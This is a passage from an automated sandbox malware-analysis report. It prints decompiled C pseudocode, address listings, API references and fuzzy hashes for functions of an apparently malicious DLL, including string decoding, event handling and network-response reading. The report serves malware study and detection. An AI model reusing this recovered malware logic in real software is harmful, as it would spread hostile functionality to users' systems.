                                          0x00c792cb
                                          0x00c792cf
                                          0x00c792d7
                                          0x00c792dc
                                          0x00c792ee
                                          0x00c792f0
                                          0x00c792f6
                                          0x00c792f6
                                          0x00c792ff
                                          0x00c792ff
                                          0x00c79301
                                          0x00c79307
                                          0x00c79307
                                          0x00c7930a
                                          0x00c79310
                                          0x00c79313
                                          0x00c7931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7931c
                                          0x00c79270
                                          0x00c7926a
                                          0x00c79253
                                          0x00c79322
                                          0x00c79322
                                          0x00c79328
                                          0x00c79328
                                          0x00c7932e
                                          0x00c7932e
                                          0x00c79337
                                          0x00c7933d
                                          0x00c7933d
                                          0x00c791fa
                                          0x00c79346

                                          APIs
                                          • SysAllocString.OLEAUT32(00C7C298), ref: 00C79205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00C792E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C792FF
                                          • SysFreeString.OLEAUT32(?), ref: 00C7932E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 28f889343d649eff764fc95c0f4460e7af52fd6b0cb2609190a8892097ff3d99
                                          • Instruction ID: caa5b1bf1874861e56635da23f856f871c82f07cf5ce58613b7f7e6e893bc419
                                          • Opcode Fuzzy Hash: 28f889343d649eff764fc95c0f4460e7af52fd6b0cb2609190a8892097ff3d99
                                          • Instruction Fuzzy Hash: DB512375D00519EFCB04DFE8C888DAEB7B9FF89704B148598E919EB261D7319D42CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C77664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E00C77664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00C748F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00C7748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00C77074(_t101,  &_v236, _a8, _t96 - _t81);
					E00C77074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00C7748A(_t101, 0xc7d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00C7748A(_a16, _a4);
						E00C72FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00C7B088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00C7B082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00C76FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00C715CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00C7687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xc7d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x00c77667
                                          0x00c77673
                                          0x00c77679
                                          0x00c7767e
                                          0x00c77682
                                          0x00c777df
                                          0x00c777e3
                                          0x00c777e3
                                          0x00c77688
                                          0x00c7768c
                                          0x00c77690
                                          0x00c77693
                                          0x00c7769e
                                          0x00c776a4
                                          0x00c776a9
                                          0x00c776ac
                                          0x00c776c6
                                          0x00c776d2
                                          0x00c776db
                                          0x00c776e5
                                          0x00c776ea
                                          0x00c776ec
                                          0x00c776ef
                                          0x00c7779d
                                          0x00c777a3
                                          0x00c777b4
                                          0x00c777c7
                                          0x00c777d7
                                          0x00000000
                                          0x00c777dc
                                          0x00c776f8
                                          0x00c776ff
                                          0x00c77703
                                          0x00c77709
                                          0x00c7770b
                                          0x00c7770d
                                          0x00c7770f
                                          0x00c77711
                                          0x00c7771b
                                          0x00c77720
                                          0x00c77722
                                          0x00c77724
                                          0x00c77725
                                          0x00c77726
                                          0x00c77727
                                          0x00c7772e
                                          0x00c77735
                                          0x00c77738
                                          0x00c77738
                                          0x00c77705
                                          0x00c77705
                                          0x00c77705
                                          0x00c77740
                                          0x00c77748
                                          0x00c77751
                                          0x00c77756
                                          0x00c77756
                                          0x00c7775b
                                          0x00000000
                                          0x00000000
                                          0x00c7775d
                                          0x00c77760
                                          0x00c7776a
                                          0x00000000
                                          0x00000000
                                          0x00c7776c
                                          0x00c7776c
                                          0x00c77776
                                          0x00c77756
                                          0x00c7775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7775b
                                          0x00c77780
                                          0x00c77783
                                          0x00c77786
                                          0x00c7778d
                                          0x00c7778d
                                          0x00c7779a
                                          0x00000000
                                          0x00c7779a
                                          0x00c77695
                                          0x00c77699
                                          0x00c7769a
                                          0x00c7769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00C77711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00C77727
                                          • memset.NTDLL ref: 00C777C7
                                          • memset.NTDLL ref: 00C777D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: d1ab38fc80ab3d554ca1d6ff41c42e3eafdb8166302197929f27d99fe6547f97
                                          • Instruction ID: 7cfaa5d0662178e373274d8f892f8a5f84bc4af0db280a2d0030f8114fbc9106
                                          • Opcode Fuzzy Hash: d1ab38fc80ab3d554ca1d6ff41c42e3eafdb8166302197929f27d99fe6547f97
                                          • Instruction Fuzzy Hash: 2641A431A0025DABDB15DFA8CC41BDE7B74EF44310F10C629F91EA7181DB709E549B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7A96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 00C7A97E
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • ResetEvent.KERNEL32(?), ref: 00C7A9F2
                                          • GetLastError.KERNEL32 ref: 00C7AA15
                                          • GetLastError.KERNEL32 ref: 00C7AAC0
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: d307ee94d898094f3f1c6e0dbca644bf0e6c30bdda202f1ac42cdfc1e8055f55
                                          • Instruction ID: 2dbe0d4bd7a7aa4fa989153b2343aabe452a3d92d6ea8a2aca938779b67f7ad3
                                          • Opcode Fuzzy Hash: d307ee94d898094f3f1c6e0dbca644bf0e6c30bdda202f1ac42cdfc1e8055f55
                                          • Instruction Fuzzy Hash: E4415B71500604BBD7219FA5CD88F9F7BBDEF88B10F148929B55BA10A0E731AA44DB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C78F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E00C78F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0xc7d138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0xc7d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E00C758BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0xc7d138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E00C7147E(_v16);
							if(_t58 == 0) {
								_t58 = E00C716DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E00C79D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E00C79D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x00c78f17
                                          0x00c78f1c
                                          0x00c78f1e
                                          0x00c78f23
                                          0x00c78f24
                                          0x00c78f29
                                          0x00c78f2a
                                          0x00c78f35
                                          0x00c78f66
                                          0x00c78f6b
                                          0x00c7902e
                                          0x00c79031
                                          0x00c79037
                                          0x00c79037
                                          0x00c78f78
                                          0x00c78f80
                                          0x00c7902b
                                          0x00000000
                                          0x00c7902b
                                          0x00c78f8b
                                          0x00c78f90
                                          0x00c78f95
                                          0x00c7901d
                                          0x00c7901e
                                          0x00c7901e
                                          0x00c79024
                                          0x00000000
                                          0x00c79024
                                          0x00c78f9b
                                          0x00c78f9d
                                          0x00c78fa3
                                          0x00c78fa4
                                          0x00c78fa4
                                          0x00c78fa7
                                          0x00c78faa
                                          0x00c78fb0
                                          0x00c78fb5
                                          0x00c78fb6
                                          0x00c78fbb
                                          0x00c78fbe
                                          0x00c78fc9
                                          0x00000000
                                          0x00000000
                                          0x00c78fd1
                                          0x00c78fd9
                                          0x00c79002
                                          0x00c79005
                                          0x00c7900c
                                          0x00c79017
                                          0x00c79017
                                          0x00000000
                                          0x00c7900c
                                          0x00c78fe5
                                          0x00c78fe9
                                          0x00000000
                                          0x00000000
                                          0x00c78feb
                                          0x00c78ff0
                                          0x00000000
                                          0x00000000
                                          0x00c78ff2
                                          0x00c78ff2
                                          0x00c78ff7
                                          0x00000000
                                          0x00000000
                                          0x00c78ff9
                                          0x00c78ffa
                                          0x00c78ffd
                                          0x00c78ffd
                                          0x00c78fa4
                                          0x00c78f3d
                                          0x00c78f45
                                          0x00c78f5e
                                          0x00c78f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c78f60
                                          0x00c78f51
                                          0x00c78f55
                                          0x00000000
                                          0x00000000
                                          0x00c78f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 00C78F1E
                                          • GetLastError.KERNEL32 ref: 00C78F37
                                            • Part of subcall function 00C79D3A: WaitForMultipleObjects.KERNEL32(00000002,00C7AA33,00000000,00C7AA33,?,?,?,00C7AA33,0000EA60), ref: 00C79D55
                                          • ResetEvent.KERNEL32(?), ref: 00C78FB0
                                          • GetLastError.KERNEL32 ref: 00C78FCB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: b12e7617269ada2b4833177e7d8d98d6ca57dd5c04733b66efdfe7e46087d342
                                          • Instruction ID: c92cc3951fdd265b6c0bb2d41c53d00665911317ebf9fe1e225266a099c88792
                                          • Opcode Fuzzy Hash: b12e7617269ada2b4833177e7d8d98d6ca57dd5c04733b66efdfe7e46087d342
                                          • Instruction Fuzzy Hash: 8B31B532640604AFCB21DBA9CC84F5E77B9EF88360F248528F56A97190DB70EE859B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C772F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E00C772F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xc7d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xc7d2a4; // 0x24ba5a8
				_t3 = _t8 + 0xc7e836; // 0x61636f4c
				_t25 = 0;
				_t30 = E00C76AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xc7d2a8, 1, 0, _t30);
					E00C7147E(_t30);
				}
				_t12 =  *0xc7d25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00C756A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00C71493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xc7d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00C77827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x00c772f3
                                          0x00c772fa
                                          0x00c77304
                                          0x00c77308
                                          0x00c7730e
                                          0x00c7731d
                                          0x00c77324
                                          0x00c77328
                                          0x00c7733a
                                          0x00c7733c
                                          0x00c7733c
                                          0x00c77341
                                          0x00c77348
                                          0x00c7739f
                                          0x00c7739f
                                          0x00c773a5
                                          0x00c773a7
                                          0x00c773a7
                                          0x00c773b1
                                          0x00c773b5
                                          0x00c773c7
                                          0x00c773c7
                                          0x00c773cb
                                          0x00c773d1
                                          0x00c773d1
                                          0x00000000
                                          0x00c77361
                                          0x00c77366
                                          0x00c7736e
                                          0x00c77372
                                          0x00c77376
                                          0x00c77376
                                          0x00c77383
                                          0x00c77387
                                          0x00c7738b
                                          0x00c773e0
                                          0x00c773e6
                                          0x00c773e6
                                          0x00c77399
                                          0x00c7739d
                                          0x00c773d4
                                          0x00c773d6
                                          0x00c773d9
                                          0x00c773d9
                                          0x00000000
                                          0x00c773d6
                                          0x00c7739d
                                          0x00000000
                                          0x00c77387

                                          APIs
                                            • Part of subcall function 00C76AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00C72098,74666F53,00000000,?,00C7D00C,?,?), ref: 00C76B2D
                                            • Part of subcall function 00C76AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 00C76B51
                                            • Part of subcall function 00C76AF7: lstrcat.KERNEL32(00000000,00000000), ref: 00C76B59
                                          • CreateEventA.KERNEL32(00C7D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00C7555B,?,?,?), ref: 00C77333
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,00C7555B,00000000,00000000,?,00000000,?,00C7555B,?,?,?), ref: 00C77393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00C7555B,?,?,?), ref: 00C773C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00C7555B,?,?,?), ref: 00C773D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: b1d8d9744de9ea8b2aa67b757fd8e5ef58e3ae16435a37e401828ff291a02bbd
                                          • Instruction ID: 5c86dda19f6503ee87826ffc9950d12489af681c48e852d2a444ff8677437cfe
                                          • Opcode Fuzzy Hash: b1d8d9744de9ea8b2aa67b757fd8e5ef58e3ae16435a37e401828ff291a02bbd
                                          • Instruction Fuzzy Hash: 7821F03260424A9BC7315B6C9C85B6E77A9FF88710B068328FD3EE6165DB70CE41A690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7A1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E00C7A1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0xc7d140; // 0xc7ad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00C758BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E00C7147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00C79D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x00c7a1f1
                                          0x00c7a1f1
                                          0x00c7a1fb
                                          0x00c7a201
                                          0x00c7a204
                                          0x00c7a208
                                          0x00c7a20e
                                          0x00c7a213
                                          0x00c7a22c
                                          0x00c7a22f
                                          0x00c7a233
                                          0x00c7a237
                                          0x00c7a238
                                          0x00c7a23d
                                          0x00c7a240
                                          0x00c7a247
                                          0x00c7a24e
                                          0x00c7a2a1
                                          0x00c7a2a7
                                          0x00c7a2ad
                                          0x00c7a2e8
                                          0x00c7a2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7a2ad
                                          0x00c7a254
                                          0x00000000
                                          0x00c7a25b
                                          0x00c7a269
                                          0x00c7a26c
                                          0x00c7a26f
                                          0x00c7a27b
                                          0x00c7a27f
                                          0x00c7a2e1
                                          0x00c7a281
                                          0x00c7a284
                                          0x00c7a288
                                          0x00c7a289
                                          0x00c7a28a
                                          0x00c7a28c
                                          0x00c7a293
                                          0x00c7a2d1
                                          0x00c7a2dc
                                          0x00c7a295
                                          0x00c7a298
                                          0x00c7a29c
                                          0x00c7a29c
                                          0x00c7a293
                                          0x00000000
                                          0x00c7a27f
                                          0x00c7a254
                                          0x00c7a218
                                          0x00c7a21e
                                          0x00c7a221
                                          0x00c7a226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7a2b6
                                          0x00c7a2be
                                          0x00c7a2c3
                                          0x00c7a2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 00C7A208
                                          • SetEvent.KERNEL32(?), ref: 00C7A218
                                          • GetLastError.KERNEL32 ref: 00C7A2A1
                                            • Part of subcall function 00C79D3A: WaitForMultipleObjects.KERNEL32(00000002,00C7AA33,00000000,00C7AA33,?,?,?,00C7AA33,0000EA60), ref: 00C79D55
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • GetLastError.KERNEL32(00000000), ref: 00C7A2D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 748e41b64c6266d983b2acb70271359da6b3faf365f6e475a8404eab509ed044
                                          • Instruction ID: 90aa917e8d9490865efd0365e0b966b29a0f99e65aec0808163eb5a45524aee8
                                          • Opcode Fuzzy Hash: 748e41b64c6266d983b2acb70271359da6b3faf365f6e475a8404eab509ed044
                                          • Instruction Fuzzy Hash: C8312FB5900309EFDB20DFE5CCC4A9EBBBCEF48301F10896AE55AA2152D7319B459F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C754AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E00C754AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00C74F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00C75749(_t23);
						}
					}
					return _t38;
				}
				if(E00C79138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xc7d2a8, 1, 0,  *0xc7d340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00C79575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00C7A642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00C7568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00C772F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x00c754ac
                                          0x00c754b9
                                          0x00c754bf
                                          0x00c754c0
                                          0x00c754c1
                                          0x00c754c2
                                          0x00c754c3
                                          0x00c754c7
                                          0x00c754d3
                                          0x00c754d7
                                          0x00c7555f
                                          0x00c7555f
                                          0x00c75562
                                          0x00c75564
                                          0x00c7556c
                                          0x00c75572
                                          0x00c75575
                                          0x00c75575
                                          0x00c75572
                                          0x00c75580
                                          0x00c75580
                                          0x00c754ea
                                          0x00c754ec
                                          0x00c754ec
                                          0x00c75503
                                          0x00c75507
                                          0x00c7550a
                                          0x00c75515
                                          0x00c7551c
                                          0x00c7551c
                                          0x00c75525
                                          0x00c75529
                                          0x00c75537
                                          0x00c7552b
                                          0x00c7552b
                                          0x00c7552c
                                          0x00c7552d
                                          0x00c7552e
                                          0x00c7552f
                                          0x00c75530
                                          0x00c75530
                                          0x00c7553c
                                          0x00c7553f
                                          0x00c75543
